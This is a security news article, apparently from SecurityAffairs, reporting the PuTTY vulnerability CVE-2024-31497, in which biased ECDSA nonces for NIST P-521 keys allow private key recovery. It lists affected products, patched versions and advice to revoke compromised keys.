The advisory published by Talos includes a list of indicators of compromise (IoCs) for this campaign.
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, brute-force)
PuTTY SSH Client flaw allows of private keys recovery
The PuTTY Secure Shell (SSH) and Telnet client are impacted by a critical vulnerability that could be exploited to recover private keys.
PuTTY tools from 0.68 to 0.80 inclusive are affected by a critical vulnerability, tracked as CVE-2024-31497, that resides in the code that generates signatures from ECDSA private keys which use the NIST P521 curve.
An attacker can exploit the vulnerability to recover NIST P-521 private keys.
“The effect of the vulnerability is to compromise the private key. An attacker in possession of a few dozen signed messages and the public key has enough information to recover the private key, and then forge signatures as if they were from you, allowing them to (for instance) log in to any servers you use that key for.” reads the advisory. “To obtain these signatures, an attacker need only briefly compromise any server you use the key to authenticate to, or momentarily gain access to a copy of Pageant holding the key. (However, these signatures are not exposed to passive eavesdroppers of SSH connections.)”
The vulnerability was discovered by researchers Fabian Bäumer and Marcus Brinkmann from the Ruhr University Bochum. Bäumer explained that the vulnerability stems from the generation of biased ECDSA cryptographic nonces, which could allow full secret key recovery.
“The PuTTY client and all related components generate heavily biased ECDSA nonces in the case of NIST P-521. To be more precise, the first 9 bits of each ECDSA nonce are zero. This allows for full secret key recovery in roughly 60 signatures by using state-of-the-art techniques. These signatures can either be harvested by a malicious server (man-in-the-middle attacks are not possible given that clients do not transmit their signature in the clear) or from any other source, e.g. signed git commits through forwarded agents.” Baumer explained. “The nonce generation for other curves is slightly biased as well. However, the bias is negligible and far from enough to perform lattice-based key recovery attacks (not considering cryptanalytical advancements).”
The following products include an affected PuTTY version and are therefore are also impacted by the flaw:
- FileZilla (3.24.1 – 3.66.5)
- WinSCP (5.9.5 – 6.3.2)
- TortoiseGit (2.4.0.2 – 2.15.0)
- TortoiseSVN (1.10.0 – 1.14.6)
The flaw has been fixed in PuTTY 0.81, FileZilla 3.67.0, WinSCP 6.3.3, and TortoiseGit 2.15.0.1. TortoiseSVN users are recommended to configure TortoiseSVN to use Plink from the latest PuTTY 0.81 release when accessing a SVN repository via SSH until a patch becomes available.
Any product or component using ECDSA NIST-P521 keys impacted by the flaw CVE-2024-31497 should be deemed compromised. These keys should be revoked by removing them from authorized_keys, GitHub repositories, and any other relevant platforms.
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, PuTTY Secure Shell (SSH))